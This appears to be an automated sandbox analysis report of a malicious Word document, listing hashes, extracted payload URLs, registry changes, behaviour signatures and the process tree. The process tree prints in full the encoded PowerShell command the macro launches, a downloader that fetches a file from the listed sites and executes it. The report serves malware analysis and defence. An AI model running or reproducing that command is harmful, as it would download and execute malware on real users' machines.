Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
15-09-2024 04:56
Behavioral task
behavioral1
Sample
e1be29a8796394531172cd0ca910f6b2_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e1be29a8796394531172cd0ca910f6b2_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e1be29a8796394531172cd0ca910f6b2_JaffaCakes118.doc
-
Size
175KB
-
MD5
e1be29a8796394531172cd0ca910f6b2
-
SHA1
a2ac4530c474e36eb62db5f0fcccef5d7b224c0f
-
SHA256
eaf897448ba42c47e03919da87640483febb9e38c0f457471d5b91d0bd6b99e7
-
SHA512
ced93a6558ae4d03c7eba50886d048490eab11f76270a85e29ff98958a5f754821dba3058cc5bb56987a9bbfa6bdb2b31e835df9b0ff0794d54b1291e09964b3
-
SSDEEP
1536:trdi1Ir77zOH98Wj2gpngx+a9FGmLtHvb:trfrzOH98ipgFFvb
Malware Config
Extracted
https://haikouweixun.com/jn5/Rbp/
http://carolinacanullo.com/js/hllPT/
http://megasolucoesti.com/R9KDq0O8w/B3KqPpe/
http://www.insulution.org/wp-admin/swift/swift/y318LGM/
http://petafilm.com/calendar/6kOpwrt/
https://dev.contractdevs.co.uk/hbbny/Kv9/
http://blog.penmman.com/wp-content/uploads/1ECbn9K/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2968 2820 powershell.exe 31 -
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2968 powershell.exe 8 2968 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0\FLAGS\ = "6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}\ = "ILabelControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE\\MSForms.exd" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{486A9256-CA5F-4161-9EF3-B32646AD63A7}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2128 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2968 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2968 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2128 WINWORD.EXE 2128 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2212 2128 WINWORD.EXE 35 PID 2128 wrote to memory of 2212 2128 WINWORD.EXE 35 PID 2128 wrote to memory of 2212 2128 WINWORD.EXE 35 PID 2128 wrote to memory of 2212 2128 WINWORD.EXE 35
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e1be29a8796394531172cd0ca910f6b2_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2212
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABOAGwAcAA3AGoAegBqAD0AKAAnAFUAegAnACsAKAAnAGwAaQAnACsAJwBwADYAYQAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0ACcAKwAnAGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAFIATwBmAGkAbABFAFwAWgAxAGgARgAxADMAQwBcAGoAUQA4AE0AXwA0ADUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIAZQBjAHQATwByAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAQwB1AGAAUgBpAHQAWQBQAFIAbwBUAG8AYwBgAE8AbAAiACAAPQAgACgAKAAnAHQAbABzADEAJwArACcAMgAnACkAKwAoACcALAAgAHQAJwArACcAbABzACcAKwAnADEAMQAnACkAKwAoACcALAAgAHQAJwArACcAbAAnACkAKwAnAHMAJwApADsAJABLADcAcAA3ADIAcAB6ACAAPQAgACgAJwBSACcAKwAnAHUAJwArACgAJwA2AG8AagByADEAaQAnACsAJwByACcAKQApADsAJABCAGQAbABqAHEAdwBiAD0AKAAoACcASgBwACcAKwAnAF8AJwApACsAKAAnADQAJwArACcAdQBrAHIAJwApACkAOwAkAFoAdABtAHEAdQBpAHcAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAUwBvACcAKwAnADUAJwArACgAJwBaACcAKwAnADEAaABmADEAJwArACcAMwAnACsAJwBjAFMAbwA1ACcAKwAnAEoAcQAnACsAJwA4AG0AXwA0ADUAUwAnACkAKwAnAG8ANQAnACkALgAiAHIAYABlAHAAbABgAEEAQwBlACIAKAAoACcAUwAnACsAJwBvADUAJwApACwAWwBzAHQAcgBJAE4ARwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAEsANwBwADcAMgBwAHoAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABKAGEAcgA1AGcAdABwAD0AKAAoACcAUgBwADkAJwArACcAcQAyACcAKwAnAGMAJwApACsAJwB3ACcAKQA7ACQATABmADMAcABwAHcAZgA9ACYAKAAnAG4AJwArACcAZQB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAFQALgBXAGUAYgBDAEwASQBlAE4AVAA7ACQASwBvAGUAMQBlADUAMgA9ACgAKAAnAGgAdAB0AHAAJwArACcAcwA6ACcAKQArACgAJwAvAC8AaAAnACsAJwBhACcAKwAnAGkAawBvAHUAJwApACsAKAAnAHcAZQBpAHgAJwArACcAdQAnACkAKwAoACcAbgAnACsAJwAuAGMAJwArACcAbwBtAC8AagAnACkAKwAoACcAbgAnACsAJwA1AC8AJwApACsAJwBSACcAKwAoACcAYgBwACcAKwAnAC8AJwApACsAKAAnACoAaAAnACsAJwB0ACcAKQArACgAJwB0AHAAJwArACcAOgAvAC8AYwBhAHIAJwArACcAbwBsAGkAJwApACsAJwBuACcAKwAoACcAYQBjACcAKwAnAGEAJwArACcAbgB1AGwAJwApACsAKAAnAGwAbwAnACsAJwAuACcAKQArACgAJwBjAG8AbQAnACsAJwAvAGoAJwArACcAcwAvAGgAJwArACcAbABsAFAAJwArACcAVAAvACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAOgAnACsAJwAvAC8AbQAnACkAKwAnAGUAJwArACcAZwAnACsAKAAnAGEAJwArACcAcwBvACcAKwAnAGwAdQBjAG8AZQBzACcAKQArACcAdAAnACsAKAAnAGkALgBjAG8AbQAvAFIAJwArACcAOQBLACcAKQArACgAJwBEAHEAMABPADgAdwAnACsAJwAvAEIAJwArACcAMwAnACkAKwAoACcASwAnACsAJwBxAFAAcABlAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcAAnACsAJwA6ACcAKQArACgAJwAvAC8AJwArACcAdwAnACkAKwAoACcAdwAnACsAJwB3AC4AJwApACsAKAAnAGkAJwArACcAbgBzAHUAbAAnACkAKwAnAHUAJwArACcAdABpACcAKwAoACcAbwAnACsAJwBuAC4AbwByAGcAJwApACsAJwAvAHcAJwArACcAcAAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQAnACkAKwAnAG4AJwArACcALwBzACcAKwAoACcAdwAnACsAJwBpAGYAJwApACsAKAAnAHQALwAnACsAJwBzAHcAaQBmAHQAJwApACsAJwAvACcAKwAoACcAeQAzADEAJwArACcAOABMACcAKQArACgAJwBHACcAKwAnAE0ALwAqAGgAdAB0AHAAJwArACcAOgAvACcAKwAnAC8AJwApACsAKAAnAHAAZQB0ACcAKwAnAGEAJwApACsAJwBmACcAKwAoACcAaQAnACsAJwBsAG0ALgAnACkAKwAnAGMAJwArACgAJwBvAG0ALwBjAGEAbABlAG4AZABhACcAKwAnAHIALwAnACsAJwA2ACcAKQArACcAawAnACsAKAAnAE8AcAB3AHIAdAAvACcAKwAnACoAJwArACcAaAAnACkAKwAnAHQAJwArACgAJwB0ACcAKwAnAHAAJwArACcAcwA6AC8ALwAnACkAKwAnAGQAJwArACcAZQAnACsAKAAnAHYALgBjAG8AbgB0AHIAJwArACcAYQBjAHQAZAAnACsAJwBlAHYAcwAuACcAKwAnAGMAbwAnACkAKwAnAC4AdQAnACsAKAAnAGsALwAnACsAJwBoACcAKQArACcAYgAnACsAKAAnAGIAbgB5AC8AJwArACcASwAnACsAJwB2ADkALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdABwACcAKQArACgAJwA6AC8ALwAnACsAJwBiAGwAJwApACsAJwBvACcAKwAnAGcALgAnACsAKAAnAHAAJwArACcAZQBuAG0AbQAnACsAJwBhAG4ALgBjAG8AJwArACcAbQAnACkAKwAoACcALwB3AHAALQBjACcAKwAnAG8AJwArACcAbgB0ACcAKQArACcAZQAnACsAKAAnAG4AdAAvACcAKwAnAHUAJwApACsAKAAnAHAAJwArACcAbABvACcAKQArACgAJwBhAGQAcwAvADEARQBDACcAKwAnAGIAbgA5ACcAKwAnAEsAJwApACsAJwAvACcAKQAuACIAcwBQAGAAbABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABLAHMAdwBmADUAcwBqAD0AKAAoACcARgBfAHMAdwAnACsAJwA1ACcAKQArACcANwBhACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAEYAbgBvADUAZQBxAHcAIABpAG4AIAAkAEsAbwBlADEAZQA1ADIAKQB7AHQAcgB5AHsAJABMAGYAMwBwAHAAdwBmAC4AIgBEAG8AYAB3AG4ATABgAG8AYQBEAGYAaQBgAEwAZQAiACgAJABGAG4AbwA1AGUAcQB3ACwAIAAkAFoAdABtAHEAdQBpAHcAKQA7ACQAWABnAGQAegAyAHgAdgA9ACgAKAAnAFIAaAB2AGEAJwArACcAegB3ACcAKQArACcAegAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgB0AG0AcQB1AGkAdwApAC4AIgBsAGUAbgBgAGcAdABIACIAIAAtAGcAZQAgADIANQA4ADgAMAApACAAewAuACgAJwBJAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdAAnACsAJwBlAG0AJwApACgAJABaAHQAbQBxAHUAaQB3ACkAOwAkAFUAbwBjAHkAbABpADYAPQAoACcAVQB4ACcAKwAoACcAaABhADUAJwArACcAawA1ACcAKQApADsAYgByAGUAYQBrADsAJABKAHQAdgAwADgAcQAzAD0AKAAnAEIAJwArACgAJwByAHcAJwArACcAOQBpAGEAdgAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARgAzAGIAcwA5ADkAdwA9ACgAJwBHADkAJwArACcAMABhACcAKwAoACcAbwB0ACcAKwAnADUAJwApACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2968
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5e788ca4f07f052a4fda72a6d8d6d0e71
SHA1847e449d28d7d6ad0e4a27168959290eb237c9d9
SHA256257518d11250b64732b66582b7df151640ef2ff44001695af23b7281424862d3
SHA51228c722ade62c9cd222d5e4eb3b856a93711443fa21328c938d22a503415bbc62665ae9b766d215c128889b3f8c64a0b3d425d013a83de93e078c81eb08c74285